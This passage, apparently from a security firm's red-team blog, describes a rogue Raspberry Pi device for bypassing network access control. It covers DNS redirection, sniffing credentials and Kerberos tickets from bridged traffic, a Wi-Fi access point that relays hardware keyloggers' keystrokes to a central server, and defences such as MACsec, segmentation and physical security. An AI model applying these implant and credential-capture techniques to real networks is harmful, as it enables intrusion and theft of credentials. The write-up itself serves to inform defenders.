One problem we had was that the attacker’s device connected to the side-channel interface isn’t a fully-fledged network participant. The device has not been assigned a network-valid IP address, and no DHCP traffic reaches it, as the client only sees its connection up to the NAC Pi. Everything else is invisible bridging and routing. This means that the attacker is not aware of any of the network’s information, including the internal DNS server. For some scenarios, this is bad: Let’s assume the attacker wants to access an internal web service. Sure, they can just enter the IP address to begin with, but what if the page’s JavaScript loads additional resources or data from, let’s say, "https://company.local/api"? Translating all calls to the corresponding IP addresses is not a trivial task and takes time. To solve this problem, our NAC Pi has a built-in DNS redirection service: While analyzing the bridge traffic to find out the required addresses for silentbridge, it also tries to find out where most of the DNS requests are sent to – and assumes that this is the network’s primary DNS server. The NAC Pi then creates iptables rules to redirect all DNS packets destined for it to this server. The attacker can now specify the NAC Pi as their DNS server (whose address is known to them), which will then redirect all DNS traffic to the detected DNS server, allowing the attacker to resolve internal hostnames as if they actually knew the network’s DNS server. Nice!
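Stripped down to its core, the redirection is a single DNAT rule; a sketch with placeholder addresses (the real service derives the target from the detected DNS server):

# Redirect DNS queries addressed to the NAC Pi to the detected internal DNS server
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination 192.168.1.10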

Credential sniffing with BruteShark

We are physically sitting on a link between an authenticated supplicant and the network. It would be a waste not to take a quick look at what the supplicant is transmitting into the network. In Windows environments, domain-joined clients usually transmit Kerberos packets over the wire. We use the CLI version of BruteShark (https://github.com/odedshimon/BruteShark) to extract those Kerberos tickets from the bridge, which we can then brute-force offline with Hashcat. BruteShark is also capable of extracting plaintext credentials from unencrypted protocols like SMTP and IMAP, but also from HTTP URLs, headers, and POST payloads, as can be seen in Figure 4.

Figure 4: Using BruteShark to sniff credentials – it has detected plaintext passwords transmitted via HTTP basic authentication

BruteSharkCli is embedded into nacpi-ctl, which we will cover later. This makes launching it as easy as executing “nacpi-ctl sniff-passwords” from the command line.

Wi-Fi access point for Wi-Fi keyloggers

In one of our penetration tests, where our NAC Pi was used for the first time, we also wanted to place some hardware keyloggers on some clients. These keyloggers are able to stream keystrokes over UDP, acting as Wi-Fi clients. The SSID and credentials for an access point needed to be configured before placing them in front of the target keyboard. We thought, "hey, it would be nice if we could just bring our own Wi-Fi network," because we didn’t have the credentials to connect to the customer network yet. But we already wanted to place some NAC Pis into the network … which are effectively Raspberry Pis … which have a Wi-Fi card on board … and also a dedicated Internet uplink over LTE. What a coincidence!

So, we used hostapd, a Linux tool to turn Wi-Fi cards into Wi-Fi access points. We set the same SSID and passphrase on all NAC Pis, effectively creating a fake mesh network: Clients connecting to this network simply use the nearest access point. To prevent signal interference, each NAC Pi uses a different Wi-Fi channel calculated via its VPN instance number set at installation. Now we have an access point for all our keyloggers. But we still need a UDP server to which the keyloggers can stream their keystrokes …
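Before getting to that, a quick look at the access point side: hostapd needs only a handful of options. A minimal configuration sketch, with all values being placeholders:

# /etc/hostapd/hostapd.conf
interface=wlan0
ssid=ExampleNet
hw_mode=g
# On the real device, the channel is derived from the VPN instance number
channel=6
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=placeholder-passphrase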

We decided to use a centralized server for this instead of collecting the keystrokes on each NAC Pi separately: our VPN gateway. First, the NAC Pi is configured as the UDP target for the keyloggers, because we already know the address (it’s simply the NAC Pi’s address inside the Wi-Fi network). The NAC Pi then takes these UDP packets and redirects them through the VPN tunnel to the VPN gateway. This also makes sure that we do not transfer potentially sensitive credentials unencrypted. On the VPN gateway, there is a small Go application that simply writes all incoming UDP traffic into a file. And this is the file where we will find our keystrokes!

To differentiate which keylogger the keystrokes are coming from, each keylogger identifies itself by the port number of the target UDP server: sending packets to port 40001 identifies it as "keylogger 1", 40002 as "keylogger 2" and so on. The Go application on the VPN server listens on a range of ports and writes incoming traffic to a separate file per port. The server’s firewall is configured to only allow connections to the UDP endpoint from within the NAC Pi VPN tunnels.

Figure 5: Looking into the keystroke file from keylogger 1

Since the Wi-Fi access point uses the LTE uplink, we can also use it to ask our ISP about the remaining data volume, e.g., by connecting a phone to the access point. We also enabled the SSH listener for the Wi-Fi interface to be able to access the NAC Pi even when the side-channel devices cannot be accessed or something else goes wrong.

Controlling behavior with nacpi-ctl

That’s a hell of a lot of features. Most of them work with the default configuration – but keep in mind that this is a hacking tool! Hackers are not exactly known to interact with software and hardware as intended. That’s why we introduced nacpi-ctl – a command line tool to configure and use specific features of our NAC Pi at runtime.

nacpi-ctl allows us to inspect the NAC Pi’s overall status (see Figure 6), to control the mapping of the peripherals, to control the Wi-Fi access point, to check the LTE mobile data volume, to supply the attack script with network information if known, to skip the packet sniffing at boot time, and to launch features like the aforementioned credential sniffing. We also added a function to reliably clear information collected during a red teaming, to protect the customer’s privacy when reusing the NAC Pi – just like a factory reset.

Figure 6: The nacpi-ctl status command shows detected network information

nacpi-ctl was built with Python using the Typer library (https://github.com/tiangolo/typer). It’s really “just” a stateless tool to keep track of udev rules, systemd services and some other configuration files. But it definitely made interaction with the NAC Pi much easier.

Streamlining the NAC Pi and gateway deployment processes

To simplify the deployment of our NAC Pi, all changes to the attack script, nacpi-ctl and the configuration files are kept in an internal GitLab repository and are bundled in a single deployment script. All you need to do to deploy a NAC Pi is flash Raspberry Pi OS Lite onto an SD card, plug it into a Raspberry Pi 4 B, clone the repository there and run the deployment script. It asks you for the VPN instance number and that’s it! After a reboot the NAC Pi is ready to go.

Figure 7: Installing a new NAC Pi with deploy.sh

To simplify deployment even further, recent versions provide pre-built images for each NAC Pi instance, which can be flashed directly onto an SD card. Manually executing the deployment script is therefore obsolete. We have forked the pi-gen tool (https://github.com/RPi-Distro/pi-gen), which is also used to build the official Raspberry Pi images, and adapted it so that the deployment script is executed during the build process. This also makes it easier for us to control and determine which Raspberry Pi OS version the NAC Pi software will ultimately run on.

We use Ansible to deploy and maintain the OpenVPN server for the NAC Pis in LTE mode. It also ensures a correct firewall configuration so that NAC Pis are allowed to connect from anywhere, but traffic injection is only possible from within the cirosec IP address ranges. The Ansible script also manages the UDP keylogger endpoints and their firewall rules on the server.

Possible mitigation scenarios in which the NAC Pi doesn’t work

Yes, you can protect yourself from this rogue device!

There is an EAPOL extension called IEEE 802.1AE ("MACsec"), which adds confidentiality and integrity to the network security cocktail. This means we would need to bypass not only authentication but also encryption and key exchange mechanisms. Currently, this is not supported by our NAC Pi appliance. MACsec is used in 802.1X-2010, so any variant of 802.1X newer than the 2004 version cannot be attacked with the NAC Pi. The problem, however, is that MACsec is currently not supported by most operating systems, including Windows. Although this functionality can be retrofitted to client devices by using tools like Cisco AnyConnect with Network Access Manager (NAM), it is far from being applicable to all network devices, such as printers. They will still have to use fallback mechanisms like 802.1X-2004 to be able to use the network. Therefore, printers will probably remain a good target for us for the time being.

However, even though our NAC Pi currently can’t bypass MACsec, silentbridge itself actually can under certain circumstances: Using a "rogue gateway attack", an attacker can effectively steal EAP credentials by diverting the supplicant’s traffic to a rogue authenticator through mechanical switching at the right time. This requires two physical A/B splitters, which function like railway switches: They can be programmatically set either to connect to the rogue device (the NAC Pi in this case) or to connect to each other directly, effectively bypassing the NAC Pi. Connecting the splitters to the rogue device allows the latter to temporarily act as the authenticator and steal the EAP credentials transmitted by the supplicant. After setting the splitters to bypass the rogue device again, the stolen credentials are then used by the rogue device to perform the authentication on its own, without having to rely on the supplicant. This attack can even be improved with a "bait ’n’ switch attack", where the supplicant is additionally forced to disconnect and reauthenticate itself. While it reauthenticates, the credentials can be stolen more reliably. Nevertheless, both variants only work with weak EAP methods, like EAP-MD5, and require the splitters mentioned above – and thus knowledge of electrical assembly and wiring. But maybe this complex attack will also find its way into our NAC Pi one day…

It is also always a good idea to adhere to other security recommendations for networks. Strong network segmentation does not help against NAC attacks, but it does make it much more difficult for an attacker to actually attack systems within the network or obtain valuable information from them. We’ve also seen customers use a VPN within the company’s network to force clients to authenticate at the application layer, even when in the office. Firewall rules, for example, were then derived from Active Directory based on the logged-in user and were only valid within the cryptographically secured VPN tunnel, rendering network attacks useless without access to a valid user. Zero Trust is another such approach, which makes a similar claim to isolation and micro-segmentation and offers good second-level protection, too. Networks with such configurations make our work much more difficult (in a good sense): The NAC Pi is still usable, but in most cases it no longer yields any added value for us.

We also encountered problems in environments where there is simply no wired LAN available and only Wi-Fi is in use. In this case, the connection is already encrypted and the NAC Pi cannot be deployed as a man-in-the-middle device, quite apart from the fact that it has no support for Wi-Fi interfaces at all. Good physical security has also often prevented the placement of the NAC Pi: access restrictions or enforced supervision by an employee for rooms with computers, and especially for server rooms, are invaluable, especially for preventing network attacks like this one. So, keep in mind: The most secure network is one in which nothing is accessible by default.

We currently do not plan to publish the source code of the NAC Pi. At every customer where we have deployed it, the NAC defense line has fallen, however convinced they were of their NAC solution. As long as this is the case, we do not consider it responsible to hand such a tool to the public. We know that there are other public NAC bypassing tools, but we are not aware of any that can cause damage outside the local network boundaries. The addition of the VPN gateway and the LTE mode makes the NAC Pi far more dangerous than the existing tools we are aware of. The built-in, automatable man-in-the-middle functions, such as the extraction of Kerberos credentials and the ability to transfer observed keystrokes to a central server through the Wi-Fi access point, are also not part of the tools known to us. With this article, however, we want to draw attention to the fact that tools like this exist and make clear that you should never be complacent, even with a seemingly good NAC solution.
